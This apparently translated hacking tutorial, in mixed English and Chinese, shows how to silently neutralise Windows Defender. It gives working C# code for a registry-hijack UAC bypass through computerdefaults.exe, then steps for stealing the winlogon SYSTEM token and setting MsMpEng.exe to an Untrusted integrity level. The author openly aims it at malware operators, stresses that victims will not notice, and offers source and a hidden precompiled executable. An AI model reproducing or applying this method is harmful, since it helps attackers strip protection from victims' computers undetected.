Windows Defender… There is so much pain in that word. Most likely, if you were even remotely connected with the spread of VPO – this antivirus has already managed to cause you a lot of inconvenience. Windows Defender……这个词充满了痛苦。最有可能的是,如果您与 VPO 的传播存在远程联系,那么该防病毒软件已经给您带来了很多不便。 Having the most extensive cloud base in the world, AV could not remain without the attention of cryptographers and malware, in the interests of each of whom it was in the interests to bypass it. 反病毒软件拥有世界上最广泛的云基础,因此不可能不受密码学家和恶意软件的关注,绕过它符合每个人的利益。 The most primitive idea that came to everyone was to try to take down the antivirus at the root. However, the system itself prevents this, it won’t work that easily. 每个人最原始的想法就是尝试从根本上消灭杀毒软件。然而,系统本身阻止了这一点,它不会那么容易工作。 They made it clear that this is possible through the use of “Set-Preference”. Unfortunately, due to the widespread use of the script, it is impossible to pull off this trick in the realities of proactive protection. 他们明确表示,这可以通过使用“设置偏好”来实现。不幸的是,由于该脚本的广泛使用,在主动保护的现实中不可能实现这一技巧。 … and actually, that’s it. This ends all the superficial information about how to disable the Defender. ……事实上,就是这样。关于如何禁用 Defender 的所有肤浅信息到此结束。
In this article, I would like to talk about a method that is already known to many users, but has not been widely publicized to this day. 在这篇文章中,我想谈谈一种许多用户已经知道但至今尚未广泛宣传的方法。 We will talk about Privilege Tokens and manipulating them in order to disable Windows Defender. 我们将讨论权限令牌以及操作它们以禁用 Windows Defender。
CHAPTER 1: PREPARATION第 1 章:准备
Let’s start, as expected, with a tedious theory. Unfortunately, without it, the essence of what is happening in the future will not be clear, so I will try to tell you as briefly as possible and in an understandable language. 正如预期的那样,让我们从一个乏味的理论开始。不幸的是,没有它,未来发生的事情的本质就不清楚,所以我会尽力用一种可以理解的语言尽可能简短地告诉你。
Privilege tokens are permissions given by the system to a process. 特权令牌是系统授予进程的权限。 For example, if a process has a “SeShutdownPrivilege” token, then it has the right to turn off your computer. 例如,如果一个进程有一个“SeShutdownPrivilege”令牌,那么它有权关闭您的计算机。 If your program does not have this token, it will not be able to perform this action. 如果您的程序没有此令牌,它将无法执行此操作。
Windows Defender uses its privileges to check files. For example, “SeRestorePlivilege”. Windows Defender 使用其权限来检查文件。例如,“SeRestorePlivilege”。 From this, we conclude that if you deprive the antivirus process of permission to check files, it will become useless and will not be able to perform this very check. 由此,我们得出的结论是,如果您剥夺防病毒进程检查文件的权限,它将变得毫无用处,并且无法执行此检查。 Any explanation will become clearer if you translate it from dry text into visualization. 如果将枯燥的文本转化为可视化,任何解释都会变得更加清晰。 Actually, for this reason, I suggest you download Process Hacker and look with your own eyes at the tokens available to a particular process. 实际上,出于这个原因,我建议您下载 Process Hacker 并亲眼查看特定进程可用的令牌。
Windows Defender is responsible for the process MsMpEng.exe we need to find it in the list and open the Tokens tab Windows Defender 负责进程 MsMpEng.exe,我们需要在列表中找到它并打开“令牌”选项卡 Here we notice that the process has many different privileges that are of key importance to it. 在这里我们注意到该进程有许多不同的特权,这些特权对其至关重要。
As you understand, we will deal with disabling these privileges. 如您所知,我们将处理禁用这些权限的问题。 This concludes the theoretical part, and we begin to implement the POC. 理论部分到此结束,我们开始实现POC。
At the very start, we are already plagued by two problems. 从一开始,我们就已经被两个问题所困扰。
The process MsMpEng.exe it is run on behalf of System. To edit its tokens, we need to have an “NT AUTHORITY\SYSTEM” user MsMpEng.exe 进程代表系统运行。要编辑其令牌,我们需要有一个“NT AUTHORITY\SYSTEM”用户
To get a SYSTEM, we will need to upgrade, which in turn occurs only from the administrator level. 要获得系统,我们需要升级,而升级只能在管理员级别进行。
The solution is the following scheme : 解决方案如下:
Yes, yes, we will have to restart the process as many as 2 times to get all the necessary rights. 是的,是的,我们必须重新启动该过程最多 2 次才能获得所有必要的权限。
We get administrator rights using UAC Bypass. 我们使用UAC Bypass获得管理员权限。
And then we get the SYSTEM level by stealing the token and starting our process with the stolen token. 然后我们通过窃取令牌并使用窃取的令牌启动我们的进程来获得系统级别。
Well, let’s start creating it. 好吧,让我们开始创建它。
CHAPTER 2: RAISING THE RIGHTS 第 2 章:提高权利
There are a lot of UAC bypass implementations, you can choose any one that suits you. In this article, I will use the most common method through editing the registry. UAC绕过的实现有很多,你可以选择适合你的一种。在本文中,我将使用最常见的方法,即编辑注册表。
Its essence is that the system application computerdefaults.exe , at startup, accesses regedit , in the path “Software\Classes\ms-settings\shell\open\command”. Our task is to edit this item on your application. 其本质是系统应用程序computerdefaults.exe在启动时访问路径“Software\Classes\ms-settings\shell\open\command”中的regedit。我们的任务是在您的应用程序上编辑此项目。 Now at startup computerdefaults.exe our application opens, but with administrator rights. Edit the registry and add the application launch via cmd. 现在,在启动时,computerdefaults.exe 我们的应用程序将打开,但具有管理员权限。编辑注册表并通过cmd添加应用程序启动。
```
string execPath = Assembly.GetEntryAssembly().Location;
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command");
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("", execPath, RegistryValueKind.String);
Registry.CurrentUser.CreateSubKey("Software\\Classes\\ms-settings\\shell\\open\\command").SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
Registry.CurrentUser.Close();
Process process = new System.Diagnostics.Process();
ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = @"/C computerdefaults.exe";
process.StartInfo = startInfo;
process.Start();```
Actually, at this stage we have already launched our process as administrator, without any warnings or icons on the icon.
CHAPTER 2.1: I AM THE SYSTEM! 第 2.1 章:我就是系统!
As already mentioned, the Windows Defender process is running on behalf of NT AUTHORITY\SYSTEM. 如前所述,Windows Defender 进程代表 NT AUTHORITY\SYSTEM 运行。
Being a normal process, we cannot edit a process running on behalf of the system. 作为普通进程,我们无法编辑代表系统运行的进程。
To explain what happened in a nutshell: 简而言之,解释一下发生了什么: Windows has a process like winlogon, it runs with the system and is responsible for user authorization. We will duplicate the token of this process and run our own program with the stolen token. Windows有一个像winlogon这样的进程,它随系统一起运行,负责用户授权。我们将复制该进程的令牌并使用窃取的令牌运行我们自己的程序。
OpenProcessToken() — Open the process token with the TOKEN_DUPLICATE access level (we get the token handle at the output) OpenProcessToken() — 使用 TOKEN_DUPLICATE 访问级别打开进程令牌(我们在输出中获取令牌句柄)
STARTUPINFO — Set the parameters for starting the process STARTUPINFO — 设置启动进程的参数
DuplicateTokenEx() — Duplicate the token with winlogon and write it down DuplicateTokenEx() — 使用 winlogon 复制令牌并将其写下来
CreateProcessWithTokenW() — Starting our process .exe with a token stolen from winlogon CreateProcessWithTokenW() — 使用从 winlogon 窃取的令牌启动我们的进程 .exe
Congratulations, you are great 恭喜你,你真棒
Let’s make an interim result: 让我们做一个临时结果:
We forced our program to run as SYSTEM, while bypassing UAC. 我们强制我们的程序以 SYSTEM 身份运行,同时绕过 UAC。
Then, a UAC bypass is applied and a second process with elevated rights is opened 然后,应用UAC绕过并打开具有提升权限的第二个进程
The second process, in turn, launches the last .exe, which has both administrator rights and is run on behalf of the system. 第二个进程依次启动最后一个 .exe,它具有管理员权限并代表系统运行。
At this point, we have fulfilled all the conditions for editing the privileges of the system process and are ready to implement disabling Windows Defender. 至此,我们已经满足了编辑系统进程权限的所有条件,准备实施禁用Windows Defender了。
CHAPTER 3: DISABLE ANTI-VIRUS 第 3 章:禁用防病毒软件
Let’s go back to the theoretical chapter of the article for a second and remember why we actually made all these upgrades. 让我们回到本文的理论章节,记住我们为什么要进行所有这些升级。 Our task is to deprive the antivirus process of privileges, thanks to which it can check files for malware. 我们的任务是剥夺防病毒进程的权限,这样它就可以检查文件是否存在恶意软件。
There are two ways to solve this problem: Remove the entire list of privileges manually. Or set the Integrity Level to “Untrusted”. 有两种方法可以解决此问题: 手动删除整个权限列表。或者将完整性级别设置为“不受信任”。
During the tests, it was found that both of these solutions are interchangeable and will lead to the same result. 在测试过程中,发现这两种解决方案是可以互换的,并且会产生相同的结果。
Therefore” we will take the path of less resistance and set the Integrity Level “Untrusted”. 因此“我们将采取阻力较小的路径,并将完整性级别设置为“不可信”。
Like you in the previous steps, we will use the diagram to explain the next steps. 就像您在前面的步骤中一样,我们将使用该图来解释接下来的步骤。
Actually, the algorithm of actions is as follows : 实际上,动作的算法如下:
OpenProcess() – get the handle of the process with access to “QueryLimitedInformation” OpenProcess() – 获取可访问“QueryLimitedInformation”的进程句柄
OpenProcessToken() – Open the process token with the access level OpenProcessToken() – 使用访问级别打开进程令牌
TOKEN_ALL_ACCESS TOKEN_MANDATORY_LABEL – fill in the structure that we will install in the process token TOKEN_ALL_ACCESS TOKEN_MANDATORY_LABEL – 填写我们将在进程令牌中安装的结构
ConvertStringSidToSid() – get the SID of the “ML_UNTRUSTED” parameter ConvertStringSidToSid() – 获取“ML_UNTRUSTED”参数的 SID
StructureToPtr() – we bring the structure into the format necessary for work StructureToPtr() – 我们将结构转换为工作所需的格式
SetTokenInformation() – Setting the “Untrusted” trust level on our process. SetTokenInformation() – 在我们的进程上设置“不受信任”的信任级别。
The SID value of ”ML_UNTRUSTED” can be found in the Microsoft documentation, at the link. https://docs.microsoft.com/en-us/op…/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab “ML_UNTRUSTED”的 SID 值可以在 Microsoft 文档的链接中找到。 https://docs.microsoft.com/en-us/op…/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab
Actually, this is the end of all the actions that we needed to do to remove privileges from the process.
So, let’s ask ourselves the rhetorical question “Why did I do this?”
The method of deleting WD via a script is dead. The method I presented in this article can currently be implemented without defects (!!!)
This method does not cut the Antivirus from the system, it simply prohibits it from performing its functions. The user will not be suspicious of a sudden notification from the system about a disabled antivirus. The user will not see any icons on the panel. There will be no changes for him, he will not even suspect the fact that his system has been left unprotected.
A similar trick can be tried with other Antiviruses, in the article Defender is taken as the most common. 可以对其他防病毒软件尝试类似的技巧,在文章中 Defender 被认为是最常见的。
The disadvantages of this idea: 这个想法的缺点:
We need Administrator rights (as well as for other methods, but come on). 我们需要管理员权限(以及其他方法,但来吧)。 If the user has them, we work around this problem through the UAC Bypass 如果用户拥有它们,我们可以通过 UAC Bypass 解决此问题
Privilege tokens are re-issued to the process after the system is restarted. Therefore, if your virus remains in the system for a long time, add disabling WD to the startup 系统重新启动后,特权令牌将重新颁发给进程。因此,如果你的病毒在系统中存留时间较长,请在启动项中添加禁用WD
After carefully rereading the entire list of pros and cons, I come to the conclusion that this method has every chance of being used in combat. 在仔细阅读了整个优缺点列表后,我得出的结论是,这种方法很有可能在战斗中使用。
Its main advantage is that the method is not burned by the Defender itself and will not be demolished when it hits the system. 它的主要优点是该方法不会被Defender本身烧毁,并且不会在击中系统时被拆除。
Disable WD.zip archive with C sources# 禁用带有 C 源代码的 WD.zip 存档#
Silent.a ZIP archive containing a pre-compiled .exe file that you can download along with the virus. It is completely invisible, runs without a console and disappears from the task manager. Silent.a ZIP 存档,其中包含预编译的 .exe 文件,您可以将其与病毒一起下载。它完全不可见,无需控制台即可运行,并且从任务管理器中消失。
This article is for informational purposes only. We do not encourage you to commit any hacking. Everything you do is your responsibility. 本文仅供参考。我们不鼓励您进行任何黑客行为。你所做的一切都是你的责任。
